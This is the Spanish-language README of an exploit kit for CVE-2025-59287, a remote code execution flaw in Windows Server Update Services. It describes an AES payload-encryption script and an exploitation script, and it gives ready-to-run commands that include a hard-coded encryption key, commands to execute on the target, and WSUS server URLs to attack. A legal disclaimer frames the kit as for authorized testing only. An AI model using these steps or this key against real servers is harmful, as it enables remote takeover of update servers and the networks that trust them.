
Kit de explotación para CVE-2025-59287, una vulnerabilidad RCE en WSUS, que incluye cifrado de payload AES y una cadena de explotación completa para pruebas de penetración autorizadas.
CVE-2025-59287 - Kit de Explotación WSUS
por adel-h4x0a
⚠️ Solo para fines educativos y de pruebas autorizadas ⚠️
Resumen
Este kit demuestra la explotación de CVE-2025-59287, una vulnerabilidad de ejecución remota de código en Windows Server Update Services (WSUS).
Componentes
· Cifrado de payload AES para la comunicación WSUS · Soporte para modos de cifrado heredado y seguro · Generación de payload personalizado
· Cadena completa de explotación para CVE-2025-59287 · Manejo robusto de errores y lógica de reintento · Soporte de payload personalizado
Estructura
📁 CVE-2025-59287-WSUS-Exploit/
├── 📄 cve-2025-59287-encr.py # Encryption module
├── 📄 cve-2025-59287-exp.py # Exploitation module
├── 📄 requirements.txt # Dependencies
└── 📄 README.md # This file
Uso
Requisitos previos
pip install -r requirements.txt
Cifrado
# Basic encryption
python cve-2025-59287-encr.py --command "calc" --mode legacy
# Encryption with custom key
python cve-2025-59287-encr.py --key "877C14E433638145AD21BD0C17393071" --command "whoami"
# Save output to file
python cve-2025-59287-encr.py --command "ipconfig" --output payload.txt
Explotación
# Basic exploitation
python cve-2025-59287-exp.py http://wsus-server:8530
# With custom payload
python cve-2025-59287-exp.py http://192.168.1.100:8530 --payload custom_payload.txt
# With advanced settings
python cve-2025-59287-exp.py http://wsus-server:8530 --timeout 60 --retries 5
Opciones
Módulo de cifrado (cve-2025-59287-encr.py)
· --key: Clave AES en formato hexadecimal (opcional)
· --command: Comando a ejecutar (por defecto: calc)
· --mode: Modo de cifrado [legacy, secure] (por defecto: legacy)
· --output: Archivo de salida para guardar el payload (opcional)
Módulo de explotación (cve-2025-59287-exp.py)
· target: URL del servidor WSUS (obligatorio) · --payload: Archivo de payload base64 personalizado (opcional) · --timeout: Tiempo de espera de solicitud en segundos (por defecto: 30) · --retries: Número de intentos de reintento (por defecto: 3) · --no-banner: Suprimir visualización del banner (opcional)
Ejemplo completo
# Generate custom payload
python cve-2025-59287-encr.py --command "whoami /all" --output custom_payload.txt
# Execute exploitation
python cve-2025-59287-exp.py http://wsus.internal.com:8530 --payload custom_payload.txt
Aviso legal
❗ Advertencia importante:
Esta herramienta se proporciona únicamente con fines educativos y para pruebas de penetración autorizadas. El uso no autorizado contra sistemas que no posea o para los que no tenga permiso explícito es ilegal.
Esta herramienta solo debe usarse en:
· Entornos de prueba que posea · Sistemas para los que haya obtenido permiso por escrito para probar · Fines educativos y académicos
El desarrollador no se hace responsable del uso ilegal o no autorizado de esta herramienta.
Licencia
Este proyecto está licenciado bajo la Licencia MIT.
Actualizaciones
· v1.0: Publicación inicial con soporte completo de explotación · v1.1: Manejo de errores mejorado y mejoras en el registro
Contribuciones
Se fomentan los informes de errores y las solicitudes de extracción para mejorar la herramienta dentro del marco del uso responsable y ético.
Nota: Siempre obtenga permiso por escrito antes de probar cualquier sistema. La conciencia de seguridad comienza con la responsabilidad. 🔒